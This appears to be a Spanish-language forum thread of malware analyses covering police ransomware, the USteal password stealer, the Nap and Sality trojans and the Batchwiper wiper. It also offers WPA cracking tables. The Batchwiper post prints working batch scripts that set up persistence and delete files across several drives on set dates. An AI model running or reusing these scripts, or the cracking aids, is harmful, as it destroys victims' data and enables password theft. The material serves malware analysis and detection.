Temas

[PARA VER EL ANALISIS EN DETALLE:]

Este troyano es del tipo ransomware, también es llamado el virus de la policía debido a que el mensaje que bloquea la pantalla del usuario infectado pertenece a dicha organización, por lo general la imagen corresponde con la entidad policial del país del equipo amenazado.

SHA256: 837eaaee10aaf84e173d9754736901ff579455a8f4163b8270af88b07ef393fe
SHA1: 2e1c0370fc4b350d5f8ae4400a1cf706fac384bd
MD5: 30ae49e2bd4b63e643c5a714fbccb3eeVer strings
Tamaño: 34.0 KB ( 34816 bytes )
Nombre: Info.Pdf_________________________________________________________...
Tipo: Win32 EXE
Etiquetas: peexe upx
Detecciones: 35 / 47
Fecha de análisis: 2013-07-19

PARA VER EL ANALISIS EN DETALLE: http://www.nyxbone.com/malware/tobfy.html

comienza su ejecución extrayendo los tipos de archivos que va a cifrar, la función en la posición 00405580 es la encargada de traer dicha información y ubicarla en memoria para ser usada por la función de cifrado posterior, las extensiones son: *.jpeg, *.jpg, *.pdf, *.pptx, *.ppt, *.xlsx, *.xls, *.rtf, *.docx, *.doc, *test.txt

Una vez obtenidas las extensiones de los archivos a cifrar el troyano se encarga de buscar dichos archivos en todas las carpetas del sistema, la siguiente imagen muestra un archivo tomado como ejemplo para ilustrar mejor el proceso.




Cuando encuentra un archivo con la extensión indicada procede a cifrar su información, primero compara las primeras letras del archivo con la cadena *AES* de ser así finaliza el proceso de lo contrario procede a leer todo el texto del archivo y cifra cada una de las letras del mismo "XOR" cada una de las letras de la clave: Pr1v37*Fr0m*Be10Ru551a (0040503B) hasta el final del mismo en 00405028 donde finaliza el proceso




La siguiente función cambia el troyano a modo escritura a través del string "wb"






Posteriormente inserta la información cifrada, primero los caracteres *AES* (para interferir con el analisis) seguido de cada uno de los caracteres cifrados, así sucesivamente hasta que sea el final del archivo (004050A5)






Finalmente pasa a la función encargada de cambiar el nombre del archivo original (0040512E) a uno con la extensión .ENCRYPTED_AND_LOCKED

Este articulo está basado en el reporte hecho por Microsoft el 22 de mayo "How easily USteal my passwords" donde se encontró un troyano oculto bajo el título de una herramienta para personalizar el juego Dota2.

Este troyano fue creado a través de un builder el cual permite crear el ejecutable con una serie de características personalizables: Capturar información personal del usuario como contraseñas (obtiene la información de los password almacenados en Internet Explorer, Opera, Chrome, Firefox y Safari), permite configurar como se hará el envío de la información ya sea a través de FTP, Email o HTTP y finalmente permite agregar opciones de protección para evitar el análisis (Anti-Wireshark, Anti-VirtualBox, Anti-Anubis, Anti-ProExp, Anti-FileMon, Anti-VMWare, Anti-Debuging, Anti-Sandboxie, Anti-ProcMon y Anti-RegMon).

Asi mismo, permite empaquetar el archivo a través de UPX, capturar la información de la dirección IP de la maquina infectada y la apariencia del archivo final.




Al ejecutar el archivo se obtienen las contraseñas ya sea a partir de las llaves de registro creadas por las aplicaciones o de una archivo en particular después esta información se comprime y se cifra en un archivo bin creado en una carpeta oculta llamada ufr_reports.




Se puede ver como se leen los contenidos de los archivos key3.db y signons.sqlite que son usados por Firefox para almacenar la información de las contraseñas.




Al analizar el flujo de paquetes de red generados durante el análisis se detectó el uso de herramientas online para obtener la información de la dirección IP




Así como el envío del archivo .bin creado y cifrado por medio del algoritmo base64.





Al decodificar los datos se puede ver el contenido del archivo con encabezado UFR!, al abrirlo con el builder se podra ver la información de las contraseñas





Saludos

Saludos

Esta es una lista de 77 tablas WPA-PSK, de 40 y 110 MB. Estas tablas son de gran ayuda ya que disminuyen considerablemente el tiempo que requiere el proceso de probar una gran cantidad de paswords sobre un Access Point especifico. Cada tabla cuenta con un aproximado de 995.000 contraseñas.

Si consideran que existen otros nombres de Access Points de importancia por favor hagamenlo saber a traves de este foro

Los enlaces de descarga se encuentran en la pagina
Fuente: http://www.nyxbone.com/wireless/wpa_tables.html


Mosh

Me interese en analizar este troyano después de leer un artículo de FireEye titulado "An Encounter with Trojan Nap", donde se demuestra el uso de funciones como SleepEx para evadir los análisis de sistemas automatizados de malware, así mismo se identifica el uso de la técnica fast flux para ocultar la identidad de los atacantes y creadores del troyano y así mantener la Botnet activa.

Para este análisis utilice dos archivos de prueba diferentes con comportamientos similares:

newbos2.exe -> Detection ratio: 12 / 46 Analysis date: 2013-02-08
b1abd1279a28f22b86a15d6dafbc28a5.exe -> Detecciones: 28 / 45 Fecha de análisis: 2013-02-11


Al ejecutar los archivos se detecto la descarga y creación de nuevos archivos maliciosos, así como el envío masivo de SPAM.





MD5: a9001ce5563cfe725e24d9b8d9413b1a
Nombre: temp79.exe
Tipo: Win32 EXE
Detecciones: 10 / 45 Fecha de análisis: 2013-02-11

Algunas modificaciones en el registro:

Código [Seleccionar] Expandir


HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SonyAgent: "C:\WINDOWS\Temp\temp79.exe"

HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Sysinternals\Process Explorer\LanguageChangedCurrent:
"DNJybYC+X15qTzsRGK2M/xIQvh287t5Ly5hp6miAz2rP3Mhgy40rzXXrgMtRG4GsKA=="


Se puede observar la gran cantidad de conexiones TCP tanto a servidores Web como a servidores de correo electrónico.




Ejemplos de los correos electrónicos enviados (SPAM), como Message-ID se envía información de la maquina infectada:




Deteccion




Mas detalles: http://www.nyxbone.com/malware/nap.html


Salu2

Hola a todos

Encontre una nueva version de este virus, si alguien necesita el archivo por favor enviar un correo.

Descripcion
El virus Sality ha evolucionado desde el año 2003, es un malware que infecta los archivos del sistema y se replica a través de la red, uniendo la maquina afectada a una red peer-to-peer la cual es usada para distribuir más contenido malicioso y programas usados para el envío de spam, robo de información privada, infectar servidores web o para realizar tareas de computo distribuido como el Password Cracking. Además de estas características también bloquea el acceso de algunos antivirus a los servidores de actualización por medio del filtrado IP.

Analisis
Al ejecutar el archivo se obtiene un mensaje que demuestra que el virus esta empaquetado con el software Themida; el cual es útil para impedir el análisis de ingeniería inversa. Realiza importantes cambios en el registro del sistema para disminuir los niveles de seguridad que existan en el mismo: Cambios como deshabilitar el Firewall, el antivirus, el sistema de actualizaciones de Windows, el UAC entre otros.

Código [Seleccionar] Expandir

HKLM\SYSTEM\CurrentControlSet\Services\amsint32\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\ErrorControl: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\ImagePath: "\??\C:\WINDOWS\system32\drivers\kroir.sys"
HKLM\SYSTEM\CurrentControlSet\Services\amsint32\DisplayName: "amsint32"

HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_AMSINT32\0000\Control\ActiveService: "amsint32"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_AMSINT32\0000\Service: "amsint32"

HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER\0000\Control\ActiveService: "IpFilterDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_IPFILTERDRIVER\0000\Service: "IpFilterDriver"

HKLM\SOFTWARE\Microsoft\Security Center\UacDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusOverride: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\AntiVirusDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\FirewallOverride: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\UpdatesDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Security Center\Svc\UacDisableNotify: 0x00000001
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\EnableLUA: 0x00000000




Como se puede ver en las llaves de registro también se instala así mismo como un servicio con el nombre amsint32 el cual a su vez extrae y ejecuta un driver (rootkit) en el Kernel que nos es posible identificar debido a que está oculto.






Para encontrar el driver fue necesario conectar un debugger al Kernel del sistema operativo y revisar la lista de módulos en ejecución. Una vez que está identificado el nombre del driver y del servicio (device) es posible encontrar la posición de memoria donde se encuentra ubicado y posteriormente revisar su estructura.





Despues de revisar el codigo se encontro una funcion en la posicion de memoria (0xf7bcab50), al revisar dicho sector se encontraron los strings de los antivirus a los cuales se les impide realizar conexiones con sus servidores de actualización





Salu2

[juboot.exe]

Hola a todos de nuevo, primero que todo les deseo un feliz y muy prospero año 2013 ;-D

----

Una investigación realizada por el Maher Center en Irán identifico un tipo de malware que elimina la información de los discos duros. Al realizar un análisis del funcionamiento se encontró que el proceso de limpieza de los archivos se ejecuta en determinadas fechas del año. Aunque el diseño del mismo es muy sencillo (simples componentes batch ) funciona y limpia el contenido de las unidades del disco duro: D:, E:, F:, G:, H:, I:

Los componentes son:

Código [Seleccionar] Expandir

GrooveMonitor.exe -  f3dd76477e16e26571f8c64a7fd4a9
juboot.exe -  fa0b300e671f73b3b0f7f415ccbe9d41
jucheck.exe - c4cd216112cbc5b8c046934843c579f6
SLEEP.EXE - ea7ed6b50a9f7b31caeea372a327bd37
WmiPrv.exe - b7117b5d8281acd56648c9d08fadf630

Al ejecutar el Dropper GrooveMonitor.exe este extrae los componentes juboot.exe y jucheck.exe los cuales están comprimidos con UPX 3.03, al descomprimirlos se encontraron los siguientes scripts:

juboot.exe

Código (dos) [Seleccionar] Expandir

@echo off & setlocal
sleep for 2
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v jucheck.exe /t REG_SZ /d "%systemroot%\system32\jucheck.exe" /f

start "" /D"%systemroot%\system32\" "jucheck.exe"



jucheck.exe

Código (dos) [Seleccionar] Expandir

@echo off & setlocal

sleep for 2
del "%systemroot%\system32\juboot.exe" /q /s /f
del "%userprofile%\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f
del "C:\Documents and Settings\All Users\Start Menu\Programs\Startup\GrooveMonitor.exe" /q /s /f

:loop
if "%date%"=="Mon 12/10/2012" goto yes
if "%date%"=="Tue 12/11/2012" goto yes
if "%date%"=="Wed 12/12/2012" goto yes

if "%date%"=="Mon 01/21/2013" goto yes
if "%date%"=="Tue 01/22/2013" goto yes
if "%date%"=="Wed 01/23/2013" goto yes

if "%date%"=="Mon 05/06/2013" goto yes
if "%date%"=="Tue 05/07/2013" goto yes
if "%date%"=="Wed 05/08/2013" goto yes

if "%date%"=="Mon 07/22/2013" goto yes
if "%date%"=="Tue 07/23/2013" goto yes
if "%date%"=="Wed 07/24/2013" goto yes

if "%date%"=="Mon 11/11/2013" goto yes
if "%date%"=="Tue 11/12/2013" goto yes
if "%date%"=="Wed 11/13/2013" goto yes

if "%date%"=="Mon 02/03/2014" goto yes
if "%date%"=="Tue 02/04/2014" goto yes
if "%date%"=="Wed 02/05/2014" goto yes

if "%date%"=="Mon 05/05/2014" goto yes
if "%date%"=="Tue 05/06/2014" goto yes
if "%date%"=="Wed 05/07/2014" goto yes

if "%date%"=="Mon 08/11/2014" goto yes
if "%date%"=="Tue 08/12/2014" goto yes
if "%date%"=="Wed 08/13/2014" goto yes

if "%date%"=="Mon 02/02/2015" goto yes
if "%date%"=="Tue 02/03/2015" goto yes
if "%date%"=="Wed 02/04/2015" goto yes

goto no

:yes

sleep for 3000
IF EXIST d:\ del "d:\*.*" /q /s /f
IF EXIST d:\ Chkdsk d:
IF EXIST e:\ del "e:\*.*" /q /s /f
IF EXIST e:\ Chkdsk e:
IF EXIST f:\ del "f:\*.*" /q /s /f
IF EXIST f:\ Chkdsk f:
IF EXIST g:\ del "g:\*.*" /q /s /f
IF EXIST g:\ Chkdsk g:
IF EXIST h:\ del "h:\*.*" /q /s /f
IF EXIST h:\ Chkdsk h:
IF EXIST i:\ del "i:\*.*" /q /s /f
IF EXIST i:\ Chkdsk i:

del "%userprofile%\*.*" /q /s /f
\\start calc
exit
:no
sleep for 3000
goto loop



Modificaciones en el registro de Windows

Código [Seleccionar] Expandir


----------------------------------
Values added:8
----------------------------------
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\qbphzragbf\Ongpujvcre\TebbirZbavgbe.rkr: 01 00 00 00 06 00 00 00 F0 B9 E5 23 27 EC CD 01
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\CurrentVersion\Run\jucheck.exe: "C:\WINDOWS\system32\jucheck.exe"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-31275: "Esta sección muestra el tamaño, tipo de archivo y otra información acerca del elemento seleccionado."
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\documentos\Batchwiper\GrooveMonitor.exe: "GrooveMonitor"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\WINDOWS\system32\juboot.exe: "Java(TM) Update Checker"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Administrador\Configuración local\temp\1.tmp\juboot.bat: "juboot"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Administrador\Configuración local\temp\4.tmp\jucheck.bat: "jucheck"
HKU\S-1-5-21-73586283-616249376-1177238915-500\Software\WinRAR SFX\C%%WINDOWS%system32%: "C:\WINDOWS\system32\"



Enlaces

http://www.certcc.ir/index.php?name=news&file=article&sid=2293